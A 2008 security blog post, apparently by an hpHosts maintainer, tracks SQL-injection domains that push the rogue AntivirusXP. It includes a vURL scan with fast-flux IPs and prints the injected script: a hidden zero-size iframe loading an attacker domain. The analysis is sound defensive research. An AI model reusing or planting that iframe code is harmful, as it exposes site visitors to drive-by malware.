See the following for the results of those that were live/dead as of a few mins ago (note that there's been thousands of these domains since the attacks against everyone began, the list doesn't include them all as not all of them have been documented (or if they were, I couldn't locate them));
http://hosts-file.net/misc/SQL_Injection_Attacks.html
Some of the domains were found courtesy of the fantastic list at;
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
I had planned to do a write-up on how the exploit was attempted, but Michael (Bloombit) has done a much more detailed job than I had planned, so I'll leave that to him.
Connie also submitted one of these for inclusion in hpHosts toward the end of August, and further analysis saw the domain being led to, changing from time to time, before it finally pointed back to itself;
http://forum.hosts-file.net/viewtopic.php?p=4945#p4945
In all cases however, both old and new, the final result was the exploit attempting
to peddle the now well known rogue, AntivirusXP. See the following for an example;
*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.19ssl.net/script.js
Server IP: 84.157.239.55 [ p549DEF37.dip.t-dialin.net ]
> 12.202.254.90 [ 12-202-254-90.client.mchsi.com ]
> 76.104.72.250 [ c-76-104-72-250.hsd1.va.comcast.net ]
> 24.1.175.116 [ c-24-1-175-116.hsd1.il.comcast.net ]
> 200.165.57.31 [ Resolution failed ]
> 75.49.217.223 [ adsl-75-49-217-223.dsl.emhril.sbcglobal.net ]
> 121.170.44.90 [ Resolution failed ]
> 87.116.180.136 [ cable-87-116-180-136.dynamic.sbb.rs ]
> 69.37.33.66 [ JERRY_DESK ]
> 71.193.25.70 [ c-71-193-25-70.hsd1.ca.comcast.net ]
> 76.170.105.146 [ cpe-76-170-105-146.socal.res.rr.com ]
> 70.218.74.127 [ 127.sub-70-218-74.myvzw.com ]
> 68.80.34.22 [ c-68-80-34-22.hsd1.pa.comcast.net ]
> 12.203.121.61 [ 12-203-121-61.client.mchsi.com ]
> 79.179.170.191 [ bzq-79-179-170-191.red.bezeqint.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
Date: 08 September 2008
Time: 23:16:15:16
*****************************************************************
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}
vURL Online:
http://vurl.mysteryfcm.co.uk/?url=http://www.19ssl.net/script.js&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on
... and not surprisingly, almost all of the newer one's I've spotted, have used fastflux. Oh and nope, the "NESCO Accounting and Finance" displayed on all of the resulting sites homepages, isn't real either ;o)
Posts
No comments:
Post a Comment